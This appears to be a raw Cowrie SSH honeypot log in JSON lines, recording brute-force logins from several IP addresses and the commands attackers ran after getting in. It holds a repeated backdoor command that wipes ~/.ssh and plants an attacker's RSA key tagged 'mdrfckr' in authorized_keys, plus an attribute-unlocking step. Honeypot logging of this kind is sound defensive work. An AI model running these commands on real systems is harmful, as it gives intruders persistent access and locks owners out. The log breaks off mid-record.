{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:18:23.996366Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:18:24.339063Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:24.340178Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.session.connect","src_ip":"45.115.155.121","src_port":57874,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea28cff0d793","protocol":"ssh","message":"New connection: 45.115.155.121:57874 (1.2.3.4:22) [session: ea28cff0d793]","sensor":"my-vps","timestamp":"2025-09-08T13:18:24.689353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:18:24.696948Z","src_ip":"45.115.155.121","session":"ea28cff0d793"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:18:25.039073Z","src_ip":"45.115.155.121","session":"ea28cff0d793"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:18:27.279900Z","src_ip":"45.115.155.121","session":"ea28cff0d793"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:28.622008Z","src_ip":"45.115.155.121","session":"ea28cff0d793"}
{"eventid":"cowrie.session.connect","src_ip":"45.115.155.121","src_port":58800,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e269aa5c678","protocol":"ssh","message":"New connection: 45.115.155.121:58800 (1.2.3.4:22) [session: 7e269aa5c678]","sensor":"my-vps","timestamp":"2025-09-08T13:18:28.934518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:18:28.937563Z","src_ip":"45.115.155.121","session":"7e269aa5c678"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:18:29.270864Z","src_ip":"45.115.155.121","session":"7e269aa5c678"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:18:30.646018Z","src_ip":"45.115.155.121","session":"7e269aa5c678"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:31.026704Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:31.027677Z","src_ip":"45.115.155.121","session":"7e269aa5c678"}
{"eventid":"cowrie.session.connect","src_ip":"151.80.61.151","src_port":56696,"dst_ip":"1.2.3.4","dst_port":22,"session":"98f74df2e804","protocol":"ssh","message":"New connection: 151.80.61.151:56696 (1.2.3.4:22) [session: 98f74df2e804]","sensor":"my-vps","timestamp":"2025-09-08T13:18:34.679870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:18:34.680957Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:18:34.701380Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.login.success","username":"root","password":"TheLast1","message":"login attempt [root/TheLast1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:18:34.824351Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:18:34.909709Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:18:34.910510Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:18:34.911459Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:34.933006Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:18:35.026680Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:18:35.027487Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:18:35.050486Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:35.051454Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.session.connect","src_ip":"151.80.61.151","src_port":56698,"dst_ip":"1.2.3.4","dst_port":22,"session":"b22aab604d62","protocol":"ssh","message":"New connection: 151.80.61.151:56698 (1.2.3.4:22) [session: b22aab604d62]","sensor":"my-vps","timestamp":"2025-09-08T13:18:35.070326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:18:35.070911Z","src_ip":"151.80.61.151","session":"b22aab604d62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:18:35.091703Z","src_ip":"151.80.61.151","session":"b22aab604d62"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:18:35.216250Z","src_ip":"151.80.61.151","session":"b22aab604d62"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:36.239285Z","src_ip":"151.80.61.151","session":"b22aab604d62"}
{"eventid":"cowrie.session.connect","src_ip":"151.80.61.151","src_port":56700,"dst_ip":"1.2.3.4","dst_port":22,"session":"e75297b68c99","protocol":"ssh","message":"New connection: 151.80.61.151:56700 (1.2.3.4:22) [session: e75297b68c99]","sensor":"my-vps","timestamp":"2025-09-08T13:18:36.259090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:18:36.260418Z","src_ip":"151.80.61.151","session":"e75297b68c99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:18:36.281088Z","src_ip":"151.80.61.151","session":"e75297b68c99"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:18:36.404339Z","src_ip":"151.80.61.151","session":"e75297b68c99"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:36.426121Z","src_ip":"151.80.61.151","session":"98f74df2e804"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:36.427028Z","src_ip":"151.80.61.151","session":"e75297b68c99"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":52428,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cf36cf3994a","protocol":"ssh","message":"New connection: 134.199.174.250:52428 (1.2.3.4:22) [session: 2cf36cf3994a]","sensor":"my-vps","timestamp":"2025-09-08T13:18:42.302458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:18:42.318309Z","src_ip":"134.199.174.250","session":"2cf36cf3994a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:18:42.662903Z","src_ip":"134.199.174.250","session":"2cf36cf3994a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1234","message":"login attempt [oracle/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:18:43.943416Z","src_ip":"134.199.174.250","session":"2cf36cf3994a"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:45.367723Z","src_ip":"134.199.174.250","session":"2cf36cf3994a"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":48060,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbade93d624f","protocol":"ssh","message":"New connection: 134.199.174.250:48060 (1.2.3.4:22) [session: dbade93d624f]","sensor":"my-vps","timestamp":"2025-09-08T13:19:11.937809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:19:11.938632Z","src_ip":"134.199.174.250","session":"dbade93d624f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:19:12.229776Z","src_ip":"134.199.174.250","session":"dbade93d624f"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123","message":"login attempt [oracle/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:19:13.462422Z","src_ip":"134.199.174.250","session":"dbade93d624f"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":57202,"dst_ip":"1.2.3.4","dst_port":22,"session":"db9d8e997cdc","protocol":"ssh","message":"New connection: 139.59.14.27:57202 (1.2.3.4:22) [session: db9d8e997cdc]","sensor":"my-vps","timestamp":"2025-09-08T13:19:13.705014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:19:13.705885Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hm